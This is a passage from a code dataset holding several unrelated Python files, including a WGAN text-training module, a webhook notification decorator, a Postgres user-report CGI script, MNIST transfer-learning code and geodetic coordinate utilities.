root logger\r\n log.setLevel(logging.INFO)\r\n return wrapped(*args, **kwargs)\r\n\r\nclass Apihelper:\r\n\r\n def __init__(self):\r\n\r\n with open(os.getcwd() + \"\\\\data.txt\", mode='w') as f:\r\n # print('header')\r\n f.write(\"Name\")\r\n f.write(\",\")\r\n f.write(\"Height\")\r\n f.write(\",\")\r\n f.write(\"Gender\")\r\n f.write(\"\\n\")\r\n\r\n @log_args\r\n def star_wars_characters(self, page_nr):\r\n page_character_list=[]\r\n for character in page_nr['results']:\r\n name_hgt_gen = character['name']+','+character['height']+','+character['gender']\r\n page_character_list.append(name_hgt_gen)\r\n\r\n return (page_character_list)\r\n\r\n\r\n def append_to_file(self, filepath,name,height,gender):\r\n with open(filepath, \"a\")as f:\r\n f.write(\",\".join([name,height,gender]))\r\n f.write(\"\\n\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"apihelper.py","file_name":"apihelper.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"69995191","text":"import os\nfrom setuptools import find_packages, setup\n\nhere = os.path.dirname(os.path.abspath(__file__))\n\nversion_ns = {}\nwith open(os.path.join(here, 'sml_sync', 'version.py')) as f:\n exec(f.read(), {}, version_ns)\n\nsetup(\n name='sml_sync',\n version=version_ns['version'],\n description='SherlockML file synchronizer',\n author='ASI Data Science',\n packages=find_packages(),\n entry_points={\n 'console_scripts': ['sml-sync=sml_sync:run']\n },\n install_requires=[\n 'sml',\n 'daiquiri',\n 'paramiko',\n 'watchdog',\n 'semantic_version',\n 'prompt_toolkit>=2.0'\n ],\n classifiers=[\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"25330452","text":"import sib_api_v3_sdk as sib_sdk\nfrom sib_api_v3_sdk.rest import 
ApiException\n\nfrom .deps import smtp\n\n\ndef send_new_message_email(from_email, from_name, to_email, to_name, link):\n mail = sib_sdk.SendSmtpEmail(\n sender={\"name\": \"Studio Rubik\", \"email\": \"noreply@studio-rubik.dev\"},\n to=[{\"name\": to_name, \"email\": to_email}],\n template_id=2,\n params={\"from_name\": from_name, \"to_name\": to_name, \"link\": link},\n )\n try:\n smtp.send_transac_email(mail)\n except ApiException as e:\n print(e)\n","sub_path":"api/src/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"534485940","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import Model\ntfkl = tf.keras.layers\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot') # Change the style of the plots to a nicer theme\nimport random\nimport time\n# From IPython.display we import clear_output() in order to be able to clear the print statements after each epoch\nfrom IPython.display import clear_output\nfrom tqdm import tqdm, tqdm_notebook # Show progress bar\nimport gensim\n\n\n\ndef timing(start):\n \"\"\"Function to time the duration of each epoch\n\n Arguments:\n start (time): Start time needed for computation \n \n Returns:\n time_per_training_step (time): Rounded time in seconds \n \"\"\"\n now = time.time()\n time_per_training_step = now - start\n return round(time_per_training_step, 4)\n\n\n\ndef discriminator_loss(real_tweet, fake_tweet):\n \"\"\"Calculate the Wasserstein loss for the discriminator but swapping the sign in order to apply gradient descent.\n\n Arguments:\n real_tweet (tensor): Linear output from discriminator\n fake_tweet (tensor): Linear output from discriminator\n\n Returns:\n x (tensor): Wasserstein Loss\n \"\"\"\n\n loss_real = - tf.reduce_mean(real_tweet)\n loss_fake = tf.reduce_mean(fake_tweet)\n\n return loss_real + loss_fake\n\n\n\ndef generator_loss(fake_tweet):\n \"\"\"Calculate the Wasserstein loss for the generator.\n\n Arguments:\n fake_tweet (tensor): Linear output from discriminator\n\n Returns:\n x (tensor): Wasserstein Loss\n \"\"\"\n\n loss_fake = - tf.reduce_mean(fake_tweet)\n\n return loss_fake\n \n \n \n@tf.function() \ndef gradient_penalty(discriminator, real_tweet, generated_tweet):\n \"\"\"Visualize performance of the Generator by feeding predefined random noise vectors through it.\n \n Arguments:\n discriminator (Discriminator): Discriminator class instance\n real_tweet (tensor): Real tweet embedding from Encoder\n generated_tweet (tensor): Fake tweet embedding from Generator\n\n Return: \n penalty (): Gradient penalty that will be added to discriminator loss\n \"\"\" \n\n # Due to the stacked approach we chose for the Autoencoder we had to alter the gradient\n # penalty by interpolating twice and calculating an average penalty. 
\n alpha = tf.random.uniform(shape=[real_tweet.shape[0], 1], minval=0, maxval=1)\n\n interpolate = alpha*real_tweet + (1-alpha)*generated_tweet\n\n output = discriminator(interpolate)\n\n gradients = tf.gradients(output, interpolate)\n\n gradient_norm = tf.sqrt(tf.reduce_sum(tf.square(gradients)))\n\n penalty = 10*tf.reduce_mean((gradient_norm-1.)**2)\n\n return penalty\n\n\n\ndef visualize_GAN(autoencoder, word2vec_model, fixed_input, random_input, train_losses_generator, train_losses_discriminator, num_epochs):\n \"\"\"Visualize performance of the Generator by feeding predefined random noise vectors through it.\n \n Arguments:\n autoencoder (AutoEncoder): AutoEncoder class instance\n word2vec_model (gensim.models.word2vec.Word2Vec): Pretrained word2vec model\n fixed_input (tensor): List containing predefined random vectors\n random_input (tensor): List containing predefined random vectors\n train_losses_generator (list): List containing the generator losses\n train_losses_discriminator (list): List containing the discriminator losses \n num_epochs (int): Current Epoch\n \"\"\" \n\n print()\n print(f\"From Fixed Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=fixed_input[0], training=False) if i.numpy()[0] != 0])}\")\n print(f\"From Fixed Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=fixed_input[1], training=False) if i.numpy()[0] != 0])}\")\n print()\n print(f\"From Random Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=random_input[0], training=False) if i.numpy()[0] != 0])}\")\n print(f\"From Random Vector: {' '.join([word2vec_model.wv.index2word[i.numpy()[0] -1] for i in autoencoder.Decoder.inference_mode(states=random_input[1], training=False) if i.numpy()[0] != 0])}\")\n\n plt.style.use('ggplot')\n \n fig1, ax1 = plt.subplots(nrows=1, ncols=1, figsize = (10, 6))\n ax1.plot(train_losses_generator, label='Generator')\n ax1.plot(train_losses_discriminator, label='Discriminator')\n ax1.set(ylabel='Loss', xlabel='Epochs', title=f'Average loss over {num_epochs} epochs')\n if num_epochs>25 and num_epochs<=50:\n ax1.set_ylim([-10,100])\n if num_epochs>50:\n ax1.set_ylim([-5,25])\n ax1.legend()\n \n plt.show()\n\n\n\n@tf.function() \ndef train_step_GAN(generator, discriminator, train_data, optimizer_generator, optimizer_discriminator, train_generator):\n \"\"\"Perform a training step for a given GAN Network by\n 1. Generating random noise for the Generator\n 2. Feeding the noise through the Generator to create fake tweet embeddings for the Discriminator \n 3. Feeding the fake and real tweet embeddings through the Discriminator \n 4. Calculating the loss for the Disriminator and the Generator \n 5. 
Performing Backpropagation and Updating the trainable variables with the calculated gradients, using the specified optimizers\n\n Arguments:\n generator (Generator): Generator class instance\n discriminator (Discriminator): Discriminator class instance\n word2vec_model (gensim.models.word2vec.Word2Vec): Pretrained word2vec model\n train_data (tf.data.Dataset): Real tweet embedding from Encoder\n optimizer_generator (tf.keras.optimizers): function from keras defining the to be applied optimizer during training\n optimizer_discriminator (tf.keras.optimizers): function from keras defining the to be applied optimizer during training\n train_generator (bool): Whether to update the generator or not\n \n Returns:\n loss_from_generator, loss_from_discriminator (Tupel): Tupel containing the loss of both the Generator and Discriminator\n \"\"\"\n\n # 1.\n noise = tf.random.normal([train_data.shape[0], 100])\n\n # Two Gradient Tapes, one for the Discriminator and one for the Generator \n with tf.GradientTape() as generator_tape, tf.GradientTape() as discriminator_tape:\n # 2.\n generated_tweet = generator(noise)\n\n # 3.\n real = discriminator(train_data)\n fake = discriminator(generated_tweet)\n\n # 4.\n loss_from_generator = generator_loss(fake)\n # Add gradient penalty to enforce lipschitz continuity\n loss_from_discriminator = discriminator_loss(real, fake) + gradient_penalty(discriminator=discriminator, real_tweet=train_data, generated_tweet=generated_tweet)\n\n # 5.\n gradients_from_discriminator = discriminator_tape.gradient(loss_from_discriminator, discriminator.trainable_variables)\n optimizer_discriminator.apply_gradients(zip(gradients_from_discriminator, discriminator.trainable_variables))\n\n # We update the generator once for ten updates to the discriminator\n if train_generator:\n gradients_from_generator = generator_tape.gradient(loss_from_generator, generator.trainable_variables)\n optimizer_generator.apply_gradients(zip(gradients_from_generator, generator.trainable_variables))\n\n return loss_from_generator, loss_from_discriminator\n \n\n\ndef train_GAN(generator, discriminator, autoencoder, word2vec_model: gensim.models.word2vec.Word2Vec, train_dataset_GAN: tf.data.Dataset, num_epochs: int=150, running_average_factor: float=0.95, learning_rate: float=0.0001):\n \"\"\"Function that implements the training algorithm for a GAN.\n\n Arguments:\n generator (Generator): Generator class instance\n discriminator (Discriminator): Discriminator class instance\n autoencoder (AutoEncoder): AutoEncoder class instance\n word2vec_model (gensim.models.word2vec.Word2Vec): Pretrained word2vec model\n train_dataset_GAN (tf.data.Dataset): Dataset to perform training on\n num_epochs (int): Defines the amount of epochs the training is performed\n learning_rate (float): To be used learning rate, per default set to 0.001\n running_average (float): To be used factor for computing the running average of the trainings loss, per default set to 0.95\n \"\"\" \n\n tf.keras.backend.clear_session()\n\n # Two optimizers one for the generator and of for the discriminator\n optimizer_generator=tf.keras.optimizers.Adam(learning_rate=learning_rate)\n optimizer_discriminator=tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n # Fixed, random vectors for visualization\n fixed_generator_input_1 = tf.random.normal([1, 100])\n fixed_generator_input_2 = tf.random.normal([1, 100])\n\n # Initialize lists for later visualization.\n train_losses_generator = []\n train_losses_discriminator = []\n\n train_generator = 
False\n\n for epoch in range(num_epochs):\n\n start = time.time()\n running_average_gen = 0\n running_average_disc = 0\n\n with tqdm(total=519) as pbar:\n for batch_no, input in enumerate(train_dataset_GAN):\n\n # Boolean used to train the discriminator 10x more often than the generator\n train_generator = False\n if batch_no % 10 == 0:\n train_generator = True\n\n gen_loss, disc_loss = train_step_GAN(generator, discriminator, train_data=input, optimizer_generator=optimizer_generator, optimizer_discriminator=optimizer_discriminator, train_generator=train_generator)\n running_average_gen = running_average_factor * running_average_gen + (1 - running_average_factor) * gen_loss\n running_average_disc = running_average_factor * running_average_disc + (1 - running_average_factor) * disc_loss\n pbar.update(1)\n\n train_losses_generator.append(float(running_average_gen))\n train_losses_discriminator.append(float(running_average_disc))\n\n clear_output()\n print(f'Epoch: {epoch+1}') \n print()\n print(f'This epoch took {timing(start)} seconds')\n print()\n print(f'The current generator loss: {round(train_losses_generator[-1], 4)}')\n print()\n print(f'The current discriminator loss: {round(train_losses_discriminator[-1], 4)}')\n print()\n\n # Random vectors for visualization that are sampled each epoch\n random_generator_input_1 = tf.random.normal([1, 100])\n random_generator_input_2 = tf.random.normal([1, 100])\n \n visualize_GAN(autoencoder=autoencoder,\n word2vec_model=word2vec_model,\n fixed_input=(generator(fixed_generator_input_1), generator(fixed_generator_input_2)), \n random_input=(generator(random_generator_input_1), generator(random_generator_input_2)), \n train_losses_generator=train_losses_generator, \n train_losses_discriminator=train_losses_discriminator, \n num_epochs=epoch+1)","sub_path":"Modules/standard_latextgan_training.py","file_name":"standard_latextgan_training.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"239513501","text":"import os, requests\nimport datetime\n\nfrom toaster.helper import get_config_path, load_default_id, format_time\n\nwebhook_url = load_default_id()\n\ndef toast(method):\n if webhook_url == '':\n raise UnboundLocalError('You have not configured your Telegram ID. Run set_incoming_webhook() first.')\n\n def insert_toast(*args, **kw):\n try:\n start = datetime.datetime.now()\n result = method(*args, **kw)\n end = datetime.datetime.now()\n diff = end - start\n # Create Message\n msg = \"🍞 Ding! 
Function {} has completed!\\nStart Time: {}\\nEnd Time: {}\\nTime Taken: {}\".format(\n method.__name__, start.strftime(\"%Y-%m-%d %H:%M:%S\"), end.strftime(\"%Y-%m-%d %H:%M:%S\"), format_time(diff)\n )\n data = {\n 'text': msg\n }\n\n # Post the payload as JSON; requests sets the Content-Type header itself.\n res = requests.post(url=webhook_url, json=data)\n return result\n\n except Exception as e:\n msg = '⚠️ An error has occurred with function {}\\nError message: {}'.format(method.__name__, str(e))\n print('Error caught:', e)\n data = {\n 'text': msg\n }\n # Send the error notification to the same webhook\n res = requests.post(url=webhook_url, json=data)\n\n return insert_toast\n\ndef set_incoming_webhook(new_webhook_url):\n new_webhook_url = str(new_webhook_url)\n config_path = get_config_path()\n with open(config_path, \"w\") as config_file:\n config_file.write(new_webhook_url)\n # Update the module-level URL so already-decorated functions pick it up.\n global webhook_url\n webhook_url = new_webhook_url\n","sub_path":"toaster/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"72896712","text":"# coding=utf-8\nimport unittest\nfrom models.AcousticModel import AcousticModel\nimport util.dataprocessor as dataprocessor\nimport tensorflow as tf\n\n\nclass TestAcousticModel(unittest.TestCase):\n model = None\n sess = None\n\n @classmethod\n def setUpClass(cls):\n with tf.Session() as sess:\n cls.model = AcousticModel(sess, 2, 50, 0.8, 0.5, 3, 0.0003, 0.33, 5, 1800, 600, 120, False,\n forward_only=False, tensorboard_dir=None, tb_run_name=None,\n timeline_enabled=False, language='english')\n\n def test_get_str_labels_and_reverse(self):\n text = \"What ! I'm not looking for... I'll do it...\"\n cleaned_str = dataprocessor.DataProcessor.clean_label(text)\n numeric_label = self.model.get_str_labels(cleaned_str)\n new_text = self.model.get_labels_str(numeric_label)\n self.assertEqual(new_text, cleaned_str)\n\n def test_3_chars_token_in_str_end(self):\n text = \"it'll\"\n cleaned_str = dataprocessor.DataProcessor.clean_label(text)\n numeric_label = self.model.get_str_labels(cleaned_str)\n self.assertEqual(numeric_label, [60, 45, 1, 79])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"models/test_AcousticModel.py","file_name":"test_AcousticModel.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"470752609","text":"#!../.venv3/bin/python\n# coding: utf-8\n\n# # List of users report\n\n# ### Imports\n\n# In[1]:\n\n\nimport sys\nimport psycopg2\nimport pandas as pd\nfrom datetime import datetime\n\n\n# ### Initial setup\n\n# In[2]:\n\n\nconn = psycopg2.connect(host='localhost',\n port='5432',\n user='mffais',\n password='pass',\n database='bigquery')\n\n\n# ### Fetch users\n\n# In[3]:\n\n\ncursor = conn.cursor()\nquery = '''\n SELECT user_pseudo_id AS user_id,\n geo ->> 'country' AS country,\n traffic_source ->> 'source' AS source,\n traffic_source ->> 'name' AS campaign,\n DATE(user_first_touch_timestamp) AS install_date\n FROM events\n WHERE geo ->> 'country' <> ''\n AND user_first_touch_timestamp IS NOT NULL\n GROUP BY user_pseudo_id, country, source, campaign, user_first_touch_timestamp\n ORDER BY country\n'''\ncursor.execute(query)\nlist_of_users = pd.read_sql(query, con=conn)\ncursor.close()\nlist_of_users.rename(columns={ 'user_id':'User ID',\n 'country':'Country',\n 'source':'Source',\n 'campaign':'Campaign',\n 'install_date':'Install date'}, 
inplace=True)\nlist_of_users.head(20)\n\n\n# ### Calculate uninstalls\n\n# In[4]:\n\n\ncursor = conn.cursor()\nquery = '''\n SELECT user_pseudo_id AS user_id,\n DATE(event_timestamp) AS uninstall_date\n FROM events\n WHERE event_name='app_remove'\n'''\ncursor.execute(query)\nuninstall = pd.read_sql(query, con=conn)\ncursor.close()\nuninstall.rename(columns={ 'user_id':'User ID', 'uninstall_date':'Uninstall date' }, inplace=True)\nuninstall.head(20)\n\n\n# ### Calculate days installed\n\n# In[5]:\n\n\nlist_of_users = pd.merge(list_of_users, uninstall, on='User ID', how='left')\nlist_of_users.head(20)\n\n\n# In[6]:\n\n\ntoday = datetime.date( datetime.now() )\n\ndef cleanNaN(row):\n uninstall_date = row['Uninstall date']\n if str( uninstall_date ) == 'nan':\n return ''\n return uninstall_date\n\ndef date_diff(row):\n install_date = row['Install date']\n if str( row['Uninstall date'] ) == '':\n used_date = today\n else:\n used_date = row['Uninstall date']\n days_installed = int( int( ( used_date - install_date ).total_seconds() ) / 24 / 60 / 60 + 1 )\n return days_installed\n\nlist_of_users['Uninstall date'] = list_of_users.apply(cleanNaN, axis=1)\nlist_of_users['Days installed'] = list_of_users.apply(date_diff, axis=1)\n\nlist_of_users.head(20)\n\n\n# ### Calculate sessions since installed\n\n# In[7]:\n\n\ncursor = conn.cursor()\nquery = '''\n SELECT user_pseudo_id AS user_id,\n COUNT(*) AS sessions\n FROM (\n SELECT event_date,\n user_pseudo_id\n FROM events\n GROUP BY event_date, user_pseudo_id\n ) AS users_by_day\n GROUP BY user_id\n'''\ncursor.execute(query)\nsessions = pd.read_sql(query, con=conn)\nsessions.rename(columns={ 'user_id':'User ID', 'sessions':'Sessions' }, inplace=True)\nsessions.head(20)\n\n\n# In[8]:\n\n\nlist_of_users = pd.merge(list_of_users, sessions, on='User ID', how='left')\nlist_of_users.head(20)\n\n\n# ### Output HTTP Header\n\n# In[9]:\n\n\nprint('Content-type: text/csv')\nprint('Content-Disposition: attachment; filename=\"list_of_users.csv\"')\nprint()\n\n\n# ### Output variables\n\n# In[10]:\n\n\nprint('# Title: List of users report')\n\n\n# ### Output result\n\n# In[11]:\n\n\n# Use a descriptive name instead of shadowing the built-in str\ncsv_output = list_of_users.to_csv(index=False)\nprint(csv_output.encode('ascii','xmlcharrefreplace').decode('utf-8'))\n\n\n# ### Release resources\n\n# In[12]:\n\n\nconn.close()\n\n","sub_path":"cgi/report_list_of_users.py","file_name":"report_list_of_users.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"197308366","text":"n = int(input())\r\ncoins = input().split()\r\ncoins = list(map(int, coins))\r\ncoins.sort(reverse=True)\r\ntotal = sum(coins) # avoid shadowing the built-in sum\r\nm_sum = 0\r\nc = 0\r\nfor i in range(n):\r\n if m_sum <= total - m_sum:\r\n m_sum += coins[i]\r\n c += 1\r\n else:\r\n break\r\nprint(c)","sub_path":"python/160A.py","file_name":"160A.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"57784317","text":"# To support both python 2 and python 3\nfrom __future__ import division, print_function, unicode_literals\nfrom datetime import datetime\nimport os.path\n\nimport tensorflow as tf\nimport numpy as np\n\nhe_init = tf.contrib.layers.variance_scaling_initializer()\nlearning_rate = 0.01\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"datasets/\")\nX_train1 = mnist.train.images\ny_train1 = mnist.train.labels\n\nX_train2 = mnist.validation.images\ny_train2 = 
mnist.validation.labels\n\nX_test = mnist.test.images\ny_test = mnist.test.labels\n\n\ndef leaky_relu(alpha=0.01):\n def parametrized_leaky_relu(z, name=None):\n return tf.maximum(alpha * z, z, name=name)\n\n return parametrized_leaky_relu\n\ndef log_dir(prefix=\"\"):\n now = datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")\n root_logdir = \"tf_logs\"\n if prefix:\n prefix += \"-\"\n name = prefix + \"run-\" + now\n return \"{}/{}/\".format(root_logdir, name)\n\ndef build_dnn(inputs, scope_name, training, n_hidden_layers=5, n_neurons=100, dropout_rate=0, initializer = he_init, activation =leaky_relu()):\n with tf.variable_scope(scope_name, \"dnn\"):\n\n inputs = tf.layers.dropout(inputs, dropout_rate, training=training)\n\n for i in range(n_hidden_layers):\n inputs = tf.layers.dense(inputs, n_neurons, kernel_initializer = initializer, name=\"layer\"+str(i))\n inputs = activation(inputs)\n inputs = tf.layers.dropout(inputs, dropout_rate, training=training)\n\n return inputs\n\ndef build_graph(n_inputs, n_outputs):\n X = tf.placeholder(tf.float32, shape=(None, 2, n_inputs), name=\"X\")\n y = tf.placeholder(tf.int32, shape=(None), name=\"y\")\n\n X1, X2 = tf.unstack(X, axis=1)\n\n training = tf.placeholder_with_default(False, shape=(), name='training')\n\n dnn_outputs1 = build_dnn(X1, \"DNN_A\", training)\n dnn_outputs2 = build_dnn(X2, \"DNN_B\", training)\n\n dnn_outputs = tf.concat([dnn_outputs1, dnn_outputs2], axis =1)\n hidden_layer = tf.layers.dense(dnn_outputs, units=10, activation=leaky_relu(), kernel_initializer = he_init, name=\"hidden_summary\")\n logits = tf.layers.dense(hidden_layer, units=1, kernel_initializer=he_init, name=\"logits\")\n\n y_proba = tf.nn.sigmoid(logits)\n y_pred = tf.cast(tf.greater_equal(logits, 0), tf.int32)\n\n y_as_float = tf.cast(y, tf.float32)\n xentropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_as_float, logits=logits)\n loss = tf.reduce_mean(xentropy)\n\n optimiser = tf.train.AdamOptimizer(learning_rate=learning_rate)\n training_op = optimiser.minimize(loss)\n\n y_pred_correct = tf.equal(y_pred, y)\n accuracy = tf.reduce_mean(tf.cast(y_pred_correct, tf.float32))\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n return X, y, loss, training_op, accuracy ,init, saver\n\ndef generate_batch(images, labels, batch_size):\n size1 = batch_size // 2\n size2 = batch_size - size1\n if size1 != size2 and np.random.rand() > 0.5:\n size1, size2 = size2, size1\n X = []\n y = []\n while len(X) < size1:\n rnd_idx1, rnd_idx2 = np.random.randint(0, len(images), 2)\n if rnd_idx1 != rnd_idx2 and labels[rnd_idx1] == labels[rnd_idx2]:\n X.append(np.array([images[rnd_idx1], images[rnd_idx2]]))\n y.append([1])\n while len(X) < batch_size:\n rnd_idx1, rnd_idx2 = np.random.randint(0, len(images), 2)\n if labels[rnd_idx1] != labels[rnd_idx2]:\n X.append(np.array([images[rnd_idx1], images[rnd_idx2]]))\n y.append([0])\n rnd_indices = np.random.permutation(batch_size)\n return np.array(X)[rnd_indices], np.array(y)[rnd_indices]\n\n\ndef train():\n X_test1, y_test1 = generate_batch(X_test, y_test, batch_size=len(X_test))\n\n X, y, loss, training_op, accuracy, init, saver = build_graph(28*28, 1)\n\n n_epochs = 300\n batch_size = 500\n\n with tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for iteration in range(mnist.train.num_examples // batch_size):\n X_batch, y_batch = generate_batch(X_train1, y_train1, batch_size)\n loss_val, _ = sess.run([loss, training_op], feed_dict={X: X_batch, y: y_batch})\n print(epoch, \"Train loss:\", 
loss_val)\n if epoch % 5 == 0:\n acc_test = accuracy.eval(feed_dict={X: X_test1, y: y_test1})\n print(epoch, \"Test accuracy:\", acc_test)\n\n save_path = saver.save(sess, \"./my_digit_comparison_model.ckpt\")\n\ntrain()\n\n","sub_path":"11_10_transfer_learning.py","file_name":"11_10_transfer_learning.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"42815532","text":"'''\nPython Exercise 70: Write a program that reads the name and price of several products. The program should ask whether\nthe user wants to keep buying. At the end, show:\n\nA) the total amount spent on the purchase.\n\nB) how many products cost more than R$1000.\n\nC) the name of the cheapest product.\n'''\n\ncount = total = produtocaro = countprodutocaro = menor = 0\nnomeprodutocaro = ' '\nnomeprodutobarato = ' '\nwhile True:\n produto = str(input(\"Enter the product name: \"))\n preco = float(input(\"Enter the product price: R$\"))\n total += preco\n count += 1\n\n if preco > 1000:\n countprodutocaro += 1\n # Track the most expensive product seen so far\n if preco > produtocaro:\n nomeprodutocaro = produto\n produtocaro = preco\n if count == 1 or preco < menor:\n menor = preco\n nomeprodutobarato = produto\n\n op = ' '\n while op not in 'YN':\n op = str(input(\"Do you want to keep buying? [Y/N] \")).upper().strip()[0]\n\n if op not in 'Y':\n break\n\nprint('{:-^40}'.format('End of purchase'))\nprint(f'Total spent on the purchase: R$ {total:.2f}')\nprint(f'Number of products costing more than R$1000.00: {countprodutocaro}')\nprint(f'The most expensive product was {nomeprodutocaro}, priced at R${produtocaro:.2f}')\nprint(f'The cheapest product was {nomeprodutobarato}, priced at R${menor:.2f}')","sub_path":"Arquivos Exercicios/Exercicios/Ex070.py","file_name":"Ex070.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"621252898","text":"import math\nfrom geompreds import orient2d, incircle\nfrom opendrivepy.point import Point\n\na = 6378137\nb = 6356752.3142\nf = (a - b) / a\ne_sq = f * (2-f)\n\ndef point_distance(pointa, pointb):\n return math.sqrt((pointa.x - pointb.x) ** 2 + (pointa.y - pointb.y) ** 2)\n\ndef line(p1, p2):\n A = (p1.y - p2.y)\n B = (p2.x - p1.x)\n C = (p1.x*p2.y - p2.x*p1.y)\n return A, B, -C\n\ndef intersection(L1, L2):\n D = L1[0] * L2[1] - L1[1] * L2[0]\n Dx = L1[2] * L2[1] - L1[1] * L2[2]\n Dy = L1[0] * L2[2] - L1[2] * L2[0]\n if D != 0:\n x = Dx / D\n y = Dy / D\n return Point(x,y)\n else:\n return False\n\ndef line_cross(line1, line2):\n L1 = line(line1[0], line1[1])\n L2 = line(line2[0], line2[1])\n\n R = intersection(L1, L2)\n if R:\n return R\n else:\n x1 = line1[0].x\n x2 = line1[1].x\n x3 = line2[0].x\n x4 = line2[1].x\n\n y1 = line1[0].y\n y2 = line1[1].y\n y3 = line2[0].y\n y4 = line2[1].y\n return Point((x1+x2+x3+x4)/4,(y1+y2+y3+y4)/4)\n\ndef orient_node(nodea, nodeb, nodec):\n return orient2d((nodea.x, nodea.y), (nodeb.x, nodeb.y), (nodec.x, nodec.y))\n\n\ndef find_diagonal(nodes):\n # find the diagonal node of node[0]\n if orient_node(nodes[0], nodes[1], nodes[2]) * orient_node(nodes[3], nodes[1], nodes[2]) < 0:\n return 3\n elif orient_node(nodes[0], nodes[1], nodes[3]) * orient_node(nodes[2], nodes[1], nodes[3]) < 0:\n return 2\n else:\n return 1\n\n\n\n\ndef enu_to_ecef(xEast, yNorth, zUp, lat0, lon0, h0):\n lamb = math.radians(lat0)\n phi = math.radians(lon0)\n s = math.sin(lamb)\n N = a / math.sqrt(1 - e_sq * s * 
s)\n\n sin_lambda = math.sin(lamb)\n cos_lambda = math.cos(lamb)\n sin_phi = math.sin(phi)\n cos_phi = math.cos(phi)\n\n x0 = (h0 + N) * cos_lambda * cos_phi\n y0 = (h0 + N) * cos_lambda * sin_phi\n z0 = (h0 + (1 - e_sq) * N) * sin_lambda\n\n t = cos_lambda * zUp - sin_lambda * yNorth\n\n zd = sin_lambda * zUp + cos_lambda * yNorth\n xd = cos_phi * t - sin_phi * xEast \n yd = sin_phi * t + cos_phi * xEast\n\n x = xd + x0 \n y = yd + y0 \n z = zd + z0 \n\n return x, y, z\n\ndef ecef_to_geodetic(x, y, z):\n # Convert from ECEF cartesian coordinates to \n # latitude, longitude and height. WGS-84\n x2 = x ** 2 \n y2 = y ** 2 \n z2 = z ** 2 \n\n a = 6378137.0000 # earth radius in meters\n b = 6356752.3142 # earth semiminor in meters \n e = math.sqrt (1-(b/a)**2) \n b2 = b*b \n e2 = e ** 2 \n ep = e*(a/b) \n r = math.sqrt(x2+y2) \n r2 = r*r \n E2 = a ** 2 - b ** 2 \n F = 54*b2*z2 \n G = r2 + (1-e2)*z2 - e2*E2 \n c = (e2*e2*F*r2)/(G*G*G) \n s = ( 1 + c + math.sqrt(c*c + 2*c) )**(1/3) \n P = F / (3 * (s+1/s+1)**2 * G*G) \n Q = math.sqrt(1+2*e2*e2*P) \n ro = -(P*e2*r)/(1+Q) + math.sqrt((a*a/2)*(1+1/Q) - (P*(1-e2)*z2)/(Q*(1+Q)) - P*r2/2) \n tmp = (r - e2*ro) ** 2 \n U = math.sqrt( tmp + z2 ) \n V = math.sqrt( tmp + (1-e2)*z2 ) \n zo = (b2*z)/(a*V) \n\n height = U*( 1 - b2/(a*V) ) \n \n lat = math.atan( (z + ep*ep*zo)/r ) \n\n temp = math.atan(y/x) \n if x >=0 : \n long = temp \n elif (x < 0) & (y >= 0):\n long = math.pi + temp \n else :\n long = temp - math.pi \n\n lat0 = lat/(math.pi/180) \n lon0 = long/(math.pi/180) \n h0 = height \n\n return lat0, lon0, h0\n\ndef enu_to_geodetic(xEast, yNorth, zUp, lat_ref, lon_ref, h_ref):\n\n x,y,z = enu_to_ecef(xEast, yNorth, zUp, lat_ref, lon_ref, h_ref)\n\n return ecef_to_geodetic(x,y,z)","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"332486176","text":"# -*- coding: utf-8 -*-\nfrom datetime import date\nimport logging\n\nfrom odoo import api\n\n_logger = logging.getLogger(__name__)\n\n\ndef get_sequence(cr, uid, code):\n env = api.Environment(cr, uid, {})\n ir_sequence = env['ir.sequence']\n sequence_name = code\n sequence_value = ir_sequence.get(sequence_name)\n if not sequence_value:\n args = {\n 'name': sequence_name,\n 'code': sequence_name,\n 'implementation': 'no_gap',\n 'padding': 4,\n }\n ir_sequence.create(args)\n sequence_value = ir_sequence.get(sequence_name)\n return sequence_name + 